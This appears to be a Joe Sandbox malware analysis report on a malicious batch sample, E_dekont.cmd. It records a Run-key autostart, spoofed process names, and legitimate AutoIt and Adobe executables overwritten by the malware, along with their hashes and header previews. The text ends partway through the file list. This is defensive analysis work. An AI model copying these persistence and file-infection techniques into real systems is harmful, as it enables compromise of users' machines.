                                                                                                                                                                                                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                                                                                                                                        Number of analysed new started processes analysed:42
                                                                                                                                                                                                                                                                                                                                                                                                                        Number of new started drivers analysed:3
                                                                                                                                                                                                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                                                                                                                        Sample name:E_dekont.cmd
                                                                                                                                                                                                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                                                                                                                                                                                                        Classification:mal100.spre.troj.spyw.expl.evad.winCMD@53/167@363/23
                                                                                                                                                                                                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Successful, ratio: 94%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Number of executed functions: 80
                                                                                                                                                                                                                                                                                                                                                                                                                        • Number of non-executed functions: 196
                                                                                                                                                                                                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Found application associated with file extension: .cmd
                                                                                                                                                                                                                                                                                                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                                                                                                                                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SIHClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                                                                                                                                                                                                                        03:23:14API Interceptor2x Sleep call for process: x.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                                        03:23:22API Interceptor6908049x Sleep call for process: wdmvmswJ.pif modified
                                                                                                                                                                                                                                                                                                                                                                                                                        03:23:26API Interceptor178x Sleep call for process: alg.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                                        03:23:31API Interceptor2x Sleep call for process: Jwsmvmdw.PIF modified
                                                                                                                                                                                                                                                                                                                                                                                                                        03:24:12API Interceptor199x Sleep call for process: msdtc.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                                        03:27:08API Interceptor1x Sleep call for process: elevation_service.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                                        08:23:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Jwsmvmdw C:\Users\Public\Jwsmvmdw.url
                                                                                                                                                                                                                                                                                                                                                                                                                        08:23:30AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Jwsmvmdw C:\Users\Public\Jwsmvmdw.url

                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1353216
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.324407502259225
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:QC4VQjGARQNhiuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:QOCAR0iusqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:D5C0C7D2DCB23489A5454EDC7E34D517
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:309647F9BF2E0B1DCDA22487580E628FA67EBC48
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1CA9C074A79F643B5E7D5012F39EC5729098B697E1E5E0EC34003BAD1F597304
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2FC594135E446820D673244E9658CA78A6BBFD4B29FB579D7EC880BA55C08B3BB15DD9080772D642A5E8882A939ACD6620213182B2A6CE4CD59CB408D7BE1FBE
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!.....*.......................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1294848
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2827155334899345
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:cNUpaKghZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:cCMKgPsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:8980573B58A481BA498D890E54C24A16
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CDE6968F36E8992CD0F0911E56693F1ABBD40940
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E719C57DC4B07D7295DDEC4E7A60BA9E36A32BCF0A2E327D23BAE64389A27F2B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E083DACB5255295BECF68827EEF4A0B829D679BE06D0BDA12DEBB1D0CB19D1F543563C308FDE152D6974B96FD8AE51755CA88D7A394F9952E2112527A1A21A17
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... .....h$......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1314304
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2741627293299915
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:iMEhwdbTqXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:YKdHqsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:B0DD7DF5038F8C6DC09A09D0C94F1C3F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8E96674E65247B31BD8183FA3D032291C743399C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:320A28DF2F1A3F176EA9BF3F980DDF46E969DFDFCD031534ABA31513CFE2D60E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B2B25FDD09534AE7F0789505C3D8CD2E77C8BD2D4C57FC0323E4FA577AFF31533244EB88E373745548C0CE06AA803B79993C9AE9C717989AC1D9FE0D919DE1DC
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !........... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2203136
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.647041040888853
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:nK0eqkSR7Xgo4TiRPnLWvJWDmg27RnWGj:nK0pR7Xn4TiRCvJWD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:78814380F69ADCE1C3DD57FD7D6BC2C4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1CCE6FB42BEBB6B2A16368B66D80B81089094A87
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F1197038DB901243571367D7BF4A9DB9956DB47DE2E93C3BC5186E5083870074
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:98687D72F3D30BA058F56298600769D65F6F505FD19330FE2D7FC9C4272E10151DE92B76961739AEE787FF4C560CD5ACDE679DE7CC1D6968CEDD5A15EE2E080E
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@..........................."......a"..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2369024
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.565066785461434
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:vfYP1JsEDkSR7Xgo4TiRPnLWvJWDmg27RnWGj:HYPBR7Xn4TiRCvJWD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1E18565B229157AF5BFD920290385F02
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:12AD95BF9A41B488CC5BF2B271150BBB199F4BB4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CD241B3E465910144A0BC9B18504C822E2C9F3436D778085CDA7C9EC556D9714
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BB9972D29882D190924613F8BA2BC861B2ADF00C3D5D2F71FC9DADD2A5B464815B25D891E0099D84665EF4B226680B607DEA854CF8C3970DEA9EBC6E618C11B8
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$......`$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1245184
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.123576065751528
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:962SYUcknnEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:aYUcknEsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:7E6B30A317E659887B9512B938CC5A76
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A7E012DE7C0A7E5AA94D1F5366ACFB5665227F8B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E66F0FF52BA23D6E4BCFC161F230B62BCBD56F383FCE33523DC1792EAABA795B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D9D65EF0CBA934FF52A0FE7EFD3E982225EB3DFD545D0C9DFFB8EFE7F25DD7B0FB3BFA3A322586DD41D50A2C72E34A2F4401823A097A95382745F848F50025EA
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@......k........................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1640448
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.166692503186719
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:L+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaS6Dmg27RnWGj:JSktbpgD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1C5A1CC6E079685DC6A1EAE78036E4C0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AD2E04A8090BD89C8D45A2D0BF3EA96CFCF06414
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BCEF2CBAA643A361448C4024AB36A188359CBF1EA8FE15D304CBF4B4FF8224CA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1908C7236FFD875787029E0E525D6D09E4BB63F1DBD7A22895F2171B3D5EB03CDB37F88FD39D0DCBA9E18E04826284F323C3AA1FAC740ED19CC83228233D0086
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.......................................... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2953728
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.094637406788883
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:lGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLVDmg27RnWGj:54OEtwiICvYMRf1D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:AC58C38487B9DB8AFFB13097CF4B9C6D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:09FEBC1847AEAA5B9FF29A2ABE508AF3A22C086F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9EEDD67E1558338216215D5E8FD154DD2656F210E83746A7E6D7698079BB5DD6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:54B4A18ECC373C759D3AA8AB5C8B601F783B11DC393EA550F8B16E08ACED1E331C36F454FA26CA5BB8068E00ACBD0C53AF426317301FDD9AF760309320DD4595
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-......%-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1485824
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.496416077690878
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:MAMuR+3kMbVjh+sqjnhMgeiCl7G0nehbGZpbD:VD+lbVjhSDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:A598CF03E34555DB0E519BBAED3C8B90
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:35F29E3D977A42BF2EFE368EFE413DF88CEC90AC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CC79FB8C51572ACB5DF434242C1F34F9983E460C6E615F032F53F25960F1C872
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E99D2D3876FE63088CBDD20771C8E4D2AA4EE297F8FFC47E95029ED341EBF86BFFA66AF55D99F4D32D50ED2E4FA4AA4FADE9DEDBC07F032F838417CF2B38B140
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..........................................................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1290240
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.277787975141009
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:NImGUcsvZZdubv7hfl3qXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:NxGBcmlasqjnhMgeiCl7G0nehbGZpbD
